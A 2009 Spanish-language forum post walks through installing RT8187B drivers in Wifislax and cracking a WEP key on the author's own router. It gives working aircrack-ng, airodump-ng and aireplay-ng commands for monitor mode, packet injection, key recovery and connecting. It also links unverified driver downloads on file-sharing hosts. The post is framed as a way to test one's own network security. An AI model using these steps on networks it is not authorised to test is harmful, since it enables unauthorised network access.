Seguridad Wireless - Wifi

Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: stone_mdq en 03-04-2009, 07:42 (Viernes)

Título: WifiSlax 3.1 con RT8187B
Publicado por: stone_mdq en 03-04-2009, 07:42 (Viernes)
Buenas tardes a todos!
Este es mi primer post. Espero salga bien.

Quiero comentarles mi experiencia personal con respecto a las redes wifi y sus famosas claves. Con este post no quiero hacer apología del delito, solo es para los que tal vez quieran probar la seguridad de sus redes o se han olvidado la clave WEP y no quieren resetear el MODEM.
Un día me puse a pensar, siendo usuario de Wifi (por comodidad mas que nada), que no quiero que me roben Internet. Esta muy de moda, "colarse" a las redes sin seguridad de los vecinos y allegados. Y pensé "¿como podían llegar a robarme a mi, si tengo clave!?" Leyendo en foros y videos de you tube, me di cuenta que estaba muy equivocado. Por suerte tengo clave WPA2, la cual es muy segura y casi no se puede averiguar. Pero decidí colocar una clave WEP de 5 caracteres y probar cuanto tardaba en descubrirla (no es muy segura) como hace la mayoría de la gente.
Utilice la ultima versión de Wifislax.

Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).
Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aquí les dejo los drivers  (http://depositfiles.com/files/yjka460ac)
Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo)

Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS),

(http://img24.imageshack.us/img24/8789/perfil1y.jpg)

Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica

(http://img24.imageshack.us/img24/1582/dibujobtf.jpg)

Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT.

(http://img15.imageshack.us/img15/4735/perfil2w.jpg)

Abri una nueva consola y escribí:
(usualmente las consolas están iniciadas en la carpeta root, en donde hemos guardado nuestro archivo)

tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual)

(http://img15.imageshack.us/img15/998/perfil5d.jpg)

cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers)

(http://img15.imageshack.us/img15/2412/perfil6.jpg)

make (con este comando instalamos los drivers)

./wlan0up (y ahora "levantamos" nuestra placa)

(http://img15.imageshack.us/img15/1202/perfil7.jpg)

iwconfig (verificamos que ya esta la placa y que todos los parámetros normales)

(http://img27.imageshack.us/img27/5104/perfil10.jpg)

abrimos una nueva consola

airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su respectiva mac (bssid), canal (ch) y nombre (essid)

airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ay esta en modo monitor

(http://img27.imageshack.us/img27/1985/perfil13.jpg)

cerramos la consola y abrimos una nueva
airodump-ng –w /mnt/sda3/pass –c1 wlan0  (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass)

(http://img9.imageshack.us/img9/6790/perfil211.jpg)

abrimos una nueva consola y ponemos
aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0  (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)”

(http://img9.imageshack.us/img9/5958/perfil1p.jpg)

si todo va bien, deberíamos ver algo así

(http://img12.imageshack.us/img12/2103/perfil2.jpg)

abrimos otra consola y colocamos
aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos)

(http://img12.imageshack.us/img12/8075/perfil3.jpg)

una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII)

(http://img12.imageshack.us/img12/3600/perfil4.jpg)

abrimos una nueva consola y utilizaremos el siguiente comando

aircrack-ptw /mnt/sda3/pass-01.cap  (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap)

(http://img15.imageshack.us/img15/9413/perfil5.jpg)

Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.

También pueden obtenerla mediante
aircrack-ng /mnt/sda3/pass-01.cap (tarda unos segundos mas) yo lo probé con los dos y dio el mismo resultado

(http://img6.imageshack.us/img6/107/perfil11.jpg)

y configuramos la conexión

iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP

ahora obtenemos una dirección IP (esto demora unos segundos)

dhcpcd wlan0

probamos un ping al router

(http://img14.imageshack.us/img14/8836/perfil13r.jpg)

y podemos probar nuestra conexión con un ping a Google por ejemplo

ping www.google.com

(http://img14.imageshack.us/img14/7639/perfil14.jpg)

y ya estamos conectados!

Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y nos pida la clave, colocamos la que nos dio el aircrack y listoooo!

Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de sus redes.
En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que me parece lo mas seguro del momento.

Gracias a toda la gente del foro que han podido ayudar en mis tantas dudas.

Saludos a todos...   ;)

http://www.gigasize.com/get.php?d=qvgmsor46kb